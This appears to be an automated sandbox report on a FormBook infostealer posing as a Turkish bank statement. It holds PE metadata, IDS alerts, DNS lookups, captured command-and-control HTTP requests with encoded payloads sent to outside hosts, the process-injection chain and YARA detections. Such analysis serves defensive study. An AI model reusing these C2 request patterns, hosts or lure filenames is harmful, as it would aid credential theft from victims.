.ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3b000 | 0xce0 | 0xe00 | False | 0.4232700892857143 | data | 4.226748830857543 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3b1d8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
RT_DIALOG | 0x3b4c0 | 0x100 | data | English | United States
RT_DIALOG | 0x3b5c0 | 0x11c | data | English | United States
RT_DIALOG | 0x3b6e0 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3b740 | 0x14 | data | English | United States
RT_VERSION | 0x3b758 | 0x248 | data | English | United States
RT_MANIFEST | 0x3b9a0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/15/23-08:43:11.353362 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.7 | 198.54.117.215
02/15/23-08:43:11.353362 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.7 | 198.54.117.215
02/15/23-08:43:11.353362 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.7 | 198.54.117.215
02/15/23-08:41:49.483195 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 50505 | 53 | 192.168.2.7 | 8.8.8.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 15, 2023 08:41:49.483195066 CET | 192.168.2.7 | 8.8.8.8 | 0xbc88 | Standard query (0) | www.wenzid4.top | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:00.063033104 CET | 192.168.2.7 | 8.8.8.8 | 0x1622 | Standard query (0) | www.cutgang.net | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:22.500111103 CET | 192.168.2.7 | 8.8.8.8 | 0x5f9 | Standard query (0) | www.cutgang.net | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:45.701394081 CET | 192.168.2.7 | 8.8.8.8 | 0xc2fa | Standard query (0) | www.cutgang.net | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:52.284214973 CET | 192.168.2.7 | 8.8.8.8 | 0x8cb6 | Standard query (0) | www.energybig.xyz | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:00.459521055 CET | 192.168.2.7 | 8.8.8.8 | 0xc6d4 | Standard query (0) | www.genuineinsights.cloud | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.443094969 CET | 192.168.2.7 | 8.8.8.8 | 0xc6be | Standard query (0) | www.octohoki.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 15, 2023 08:41:49.588150978 CET | 8.8.8.8 | 192.168.2.7 | 0xbc88 | No error (0) | www.wenzid4.top | | 107.148.8.96 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:00.084255934 CET | 8.8.8.8 | 192.168.2.7 | 0x1622 | No error (0) | www.cutgang.net | cutgang.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 15, 2023 08:42:00.084255934 CET | 8.8.8.8 | 192.168.2.7 | 0x1622 | No error (0) | cutgang.net | | 194.102.227.30 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:22.599400043 CET | 8.8.8.8 | 192.168.2.7 | 0x5f9 | No error (0) | www.cutgang.net | cutgang.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 15, 2023 08:42:22.599400043 CET | 8.8.8.8 | 192.168.2.7 | 0x5f9 | No error (0) | cutgang.net | | 194.102.227.30 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:45.721196890 CET | 8.8.8.8 | 192.168.2.7 | 0xc2fa | No error (0) | www.cutgang.net | cutgang.net | | CNAME (Canonical name) | IN (0x0001) | false
Feb 15, 2023 08:42:45.721196890 CET | 8.8.8.8 | 192.168.2.7 | 0xc2fa | No error (0) | cutgang.net | | 194.102.227.30 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:42:52.304491997 CET | 8.8.8.8 | 192.168.2.7 | 0x8cb6 | No error (0) | www.energybig.xyz | | 184.94.215.91 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:00.567372084 CET | 8.8.8.8 | 192.168.2.7 | 0xc6d4 | No error (0) | www.genuineinsights.cloud | | 66.96.162.149 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | www.octohoki.net | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001) | false
Feb 15, 2023 08:43:08.471157074 CET | 8.8.8.8 | 192.168.2.7 | 0xc6be | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001) | false
                                                • www.wenzid4.top
                                                • www.energybig.xyz
                                                • www.genuineinsights.cloud
                                                • www.octohoki.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49715 | 107.148.8.96 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 15, 2023 08:41:49.823447943 CET | 285 | OUT | GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZG HTTP/1.1
                                                Host: www.wenzid4.top
                                                Connection: close
Feb 15, 2023 08:41:50.030621052 CET | 285 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 15 Feb 2023 07:40:07 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49724 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 15, 2023 08:42:52.480922937 CET | 333 | OUT | POST /ghii/ HTTP/1.1
                                                Host: www.energybig.xyz
                                                Connection: close
                                                Content-Length: 194
                                                Cache-Control: no-cache
                                                Origin: http://www.energybig.xyz
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.energybig.xyz/ghii/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: xMjnfN-Y=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(R1eHo~qRLAyNMLbT9nzCKU.
Feb 15, 2023 08:42:52.809778929 CET | 334 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:42:52 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                Feb 15, 2023 08:42:52.809811115 CET335INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                Feb 15, 2023 08:42:52.809828997 CET337INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                Feb 15, 2023 08:42:52.809843063 CET338INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                Feb 15, 2023 08:42:52.809859037 CET338INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.7 | 49725 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Feb 15, 2023 08:42:55.179994106 CET | 339 | OUT | GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2 HTTP/1.1
                                                Host: www.energybig.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 15, 2023 08:42:55.435777903 CET | 340 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:42:55 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                3 | 192.168.2.7 | 49727 | 66.96.162.149 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Feb 15, 2023 08:43:00.676424980 CET | 353 | OUT | POST /ghii/ HTTP/1.1
                                                Host: www.genuineinsights.cloud
                                                Connection: close
                                                Content-Length: 194
                                                Cache-Control: no-cache
                                                Origin: http://www.genuineinsights.cloud
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.genuineinsights.cloud/ghii/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: xMjnfN-Y=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8AkcFgs86GtRWexRzjY8uICU0U.
                                                Feb 15, 2023 08:43:00.794483900 CET | 354 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:43:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 867
                                                Connection: close
                                                Server: Apache/2
                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                Accept-Ranges: bytes
                                                Age: 0
                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                4 | 192.168.2.7 | 49728 | 66.96.162.149 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Feb 15, 2023 08:43:03.306972980 CET | 355 | OUT | GET /ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyt HTTP/1.1
                                                Host: www.genuineinsights.cloud
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 15, 2023 08:43:03.422291994 CET | 356 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 15 Feb 2023 07:43:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 867
                                                Connection: close
                                                Server: Apache/2
                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                Accept-Ranges: bytes
                                                Age: 0
                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                5 | 192.168.2.7 | 49729 | 198.54.117.215 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Feb 15, 2023 08:43:08.648824930 CET | 357 | OUT | POST /ghii/ HTTP/1.1
                                                Host: www.octohoki.net
                                                Connection: close
                                                Content-Length: 194
                                                Cache-Control: no-cache
                                                Origin: http://www.octohoki.net
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.octohoki.net/ghii/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: xMjnfN-Y=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmI01nqZ9Mh7O-XyU-PjpLfaA.
                                                Feb 15, 2023 08:43:08.823725939 CET | 358 | IN | HTTP/1.1 405 Not Allowed
                                                Date: Wed, 15 Feb 2023 07:43:08 GMT
                                                Content-Type: text/html
                                                Content-Length: 154
                                                Connection: close
                                                Server: namecheap-nginx
                                                Allow: GET, HEAD
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                6 | 192.168.2.7 | 49730 | 198.54.117.215 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Feb 15, 2023 08:43:11.353362083 CET | 359 | OUT | GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64h HTTP/1.1
                                                Host: www.octohoki.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Target ID:0
                                                Start time:08:41:09
                                                Start date:15/02/2023
                                                Path:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                Imagebase:0x400000
                                                File size:311919 bytes
                                                MD5 hash:D668AE995548E2DC9B3193CB59AC9C02
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Target ID:1
                                                Start time:08:41:09
                                                Start date:15/02/2023
                                                Path:C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i
                                                Imagebase:0x10a0000
                                                File size:143360 bytes
                                                MD5 hash:7719839B64AEF3F35ABECB784C0BDB46
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 13%, ReversingLabs
                                                Reputation:low

                                                Target ID:2
                                                Start time:08:41:10
                                                Start date:15/02/2023
                                                Path:C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe
                                                Imagebase:0x10a0000
                                                File size:143360 bytes
                                                MD5 hash:7719839B64AEF3F35ABECB784C0BDB46
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                Reputation:low

                                                Target ID:3
                                                Start time:08:41:16
                                                Start date:15/02/2023
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff75ed40000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:9
                                                Start time:08:41:33
                                                Start date:15/02/2023
                                                Path:C:\Windows\SysWOW64\wlanext.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                Imagebase:0x8a0000
                                                File size:78848 bytes
                                                MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                Reputation:moderate

                                                  Execution Graph

                                                  Execution Coverage:15.9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.5%
                                                  Total number of Nodes:1379
                                                  Total number of Limit Nodes:25
